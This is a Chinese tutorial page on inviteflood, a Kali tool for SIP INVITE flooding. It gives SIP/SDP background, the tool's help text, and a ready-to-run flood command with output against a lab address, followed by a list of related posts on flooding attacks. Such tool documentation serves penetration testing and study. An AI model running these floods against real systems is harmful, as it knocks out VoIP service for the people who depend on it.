inviteflood -SIP/SDP 泛洪攻击
0x00前言
会话发起协议(Session Initiation Protocol,缩写SIP)
会话描述协议(Session Description Protocol或简写SDP)描述的是流媒体的初始化参数。
SIP与H.323一样,是用于VoIP最主要的信令协议之一。SIP最初由IETF标准化和管理,而H.323VoIP协议则从传统上与ITU有着更多的联系。
SIP的设计目标之一是提供类似公用交换电话网(PSTN)中呼叫处理功能的扩展集。在这个扩展集中,实现类似日常电话的操作:拨号,振铃,回铃音或者忙音,只是实现方式和术语有所不同。
SIP也实现了许多七号信令系统(SS7)中更高级的呼叫处理功能,尽管这两个协议相差很远。SS7是一个高度集中处理的协议,其特点表现为高复杂度的中心网络结构和无智能的哑终端(传统的电话机)。SIP则是一个点对点协议,所以它只需要一个相对简单的(因此也高度可扩展的)核心网络,而将处理工作下放给连接在网络边缘的智能端点(装有硬件或软件的终端设备)。SIP的许多功能在端点中实现,这与传统的SS7将其在网络核心设备实现的作法大异其趣。
SIP同HTTP相似并采用了后者的一些设计原则:SIP报文是人类可读的,并且也是采取请求-应答的流程。SIP借用了许多HTTP状态码,如常见的'404 not found'。
SDP用于和RTSP以及SIP协同工作,也可被单独用来描述多播会话。
0x01 简介
通过TCP/UDP进行泛洪攻击的SIP/SDP会话,该工具可以在本i机产生大量的流量,因为需要在本地读取数据进行对外发送。所以在流量监控时可能会产生40M/s的速度。
使用帮助
root@kali:~# inviteflood -h
inviteflood - Version 2.0
June 09, 2006
Usage:
Mandatory -
interface (e.g. eth0)
target user (e.g. "" or john.doe or 5000 or "1+210-555-1212")
target domain (e.g. enterprise.com or an IPv4 address)
IPv4 addr of flood target (ddd.ddd.ddd.ddd)
flood stage (i.e. number of packets)
Optional -
-a flood tool "From:" alias (e.g. jane.doe)
-i IPv4 source IP address [default is IP address of interface]
-S srcPort (0 - 65535) [default is well-known discard port 9]
-D destPort (0 - 65535) [default is well-known SIP port 5060]
-l lineString line used by SNOM [default is blank]
-s sleep time btwn INVITE msgs (usec)
-h help - print this usage
-v verbose output mode
0x02 使用示例
使用接口eth0 并且提供5000用户,使用100个包向目标域名(example.local) 和泛洪主机(192.168.1.5) 进行泛洪攻击。
root@kali:~# inviteflood eth0 5000 example.local 192.168.1.5 100
inviteflood - Version 2.0
June 09, 2006
source IPv4 addr:port = 192.168.1.202:9
dest IPv4 addr:port = 192.168.1.5:5060
targeted UA = 5000@192.168.1.1
Flooding destination with 100 packets
sent: 100
欢迎大家分享更好的思路,热切期待^^_^^ !!!
inviteflood -SIP/SDP 泛洪攻击相关推荐
- 泛洪攻击(Flood)与TCP代理(TCP proxy)
下文摘自H3C攻击防范指导手册 泛洪攻击 网络上常常会发生泛洪攻击和网络扫描攻击.泛洪攻击指攻击者向攻击目标发送大量的虚假请求,驱使被攻击者由于不断应付这些无用信息而筋疲力尽,合法的用户却由此无法享受 ...
- sip gw功能包括_完整SIP/SDP媒体协商概论-SIP/WebRTC概要
Session Description Protocol(简称是SDP)全称是会话描述协议,此协议用来创建一种协商机制,这种协商机制是由呼叫控制协议创建的介于两个呼叫用户之间的会话进行,协商机制支持 ...
- 海康sip服务器地址_完整SIP/SDP媒体协商概论SDP基础使用要求
接完整SIP/SDP媒体协商概论-SDP基础-核心定义全解.上一个章节笔者介绍了关于SDP的一些核心概念(第一章节和第二章节),今天,我们继续在此之间讨论SDP的其余基础内容(从第三章节开始).在以下 ...
- 智能终端会议系统(20)---网络视频传输协议--RTP/RTCP/RTSP/SIP/SDP 之间关系
网络视频传输协议--RTP/RTCP/RTSP/SIP/SDP 之间关系 RTP/RTCP/RTSP/SIP/SDP 关系 1. RTP Real-time Transport Protocol,是用 ...
- RTP/RTCP/RTSP/SIP/SDP 关系(直接看总结)
RTP/RTCP/RTSP/SIP/SDP 关系 RTP(实时传输协议,传输层) Real-time Transport Protocol)是用于Internet上针对多媒体数据流的一种传输层协议 ...
- 分分钟学会系列:mac地址泛洪攻击实验
一.实验目的: 通过实战深入理解mac地址泛洪攻击的原理. 二.实验原理: 交换机中有一张非常重要的表,叫做mac表,这个表是一个硬件组成的表,主要是完成快速转发.mac表有大小限制,不同的交换机的m ...
- python实现局域网攻击_mac泛洪攻击arp欺骗(python脚本)
mac地址泛洪攻击 原理:传统的交换机在数据转发过程中依靠对CAM表的查询来确定正确的转发接口,一旦在查询过程中无法找到相关的目的MAC对应的条目,此数据帧将作为广播帧来处理,CAM表的容量有限,只能 ...
- syn泛洪 过滤_SYN泛洪攻击详解
SYN攻击利用的是TCP的三次握手机制,攻击端利用伪造的IP地址向被攻击端发出请求,而被攻击端发出的响应 报文将永远发送不到目的地,那么被攻击端在等待关闭这个连接的过程中消耗了资源,如果有成千上万的这 ...
- 关于 泛洪攻击,你需要知道的一切
一.攻击原理: SYN攻击属于DOS攻击的一种,它利用TCP协议缺陷,通过发送大量的半连接请求,耗费服务器CPU和内存资源. SYN攻击除了能影响主机外,还可以危害路由器,防火墙等网络系统,事实上SY ...
最新文章
- Linux 打开/关闭CPU命令
- verilog简易密码锁设计
- java nextintln_java – 从lambda表达式引用的局部变量必须是final或者有效的final
- 【UI/UX】GUI设计指南
- python对非it上班族有用吗_非专业人士学Python有用吗?
- 网络知识 -- 第二部
- AMS1117降压电路
- 【网络安全】企业内网中的横向移动
- 如何使用计算机对文件修改密码,win7系统给共享文件夹设置密码的操作办法
- uart硬件一些小知识
- hp 交换机远程连接_Hp服务器 iLO3 使用方法
- Go语言和Java的面向对象比较
- 分享你一定不知道的10 款小工具
- 样式的新建、修改和导入/导出
- python-名字按拼音排序-(用pypinyin)
- Error relaunching VirtualBox VM process:5错误解决
- PLA,FPGA 简介
- 【C语言程序设计】从键盘上输入某年某月(包括闰年),编程输出该年的该月拥有的天数。
- C#时间格式转换问题(12小时制和24小时制)
- 北山白云里,隐者自怡悦。
热门文章
- suma在c语言中表示什么变量,大学C语言程序设计考试试题及答案3套.doc
- java 工具类-去除字符串中特殊字符、全角转为半脚、获取字符串中姓名/电话、姓名重复后追加a.b.c...aa,ab..
- Tensorflow2.0学习(三) — Keras基础应用(Cifar-10图像分类)
- NRF52832之ESB功能与NRF24L01进行2.4G通信
- java mybatis 批量更新数据_Mybatis批量更新详解
- java hive建表_java jdbc 操作 hive 建表 load 数据
- word.excel属于计算机等级吗,Word、Excel、PPT也有等级认证考试,但考证需三思
- 招聘网站—Hive数据分析
- 流程图、顺序图、状态图他们三者分别解决什么样的问题?
- JAVA17中使用JS引擎Nashorn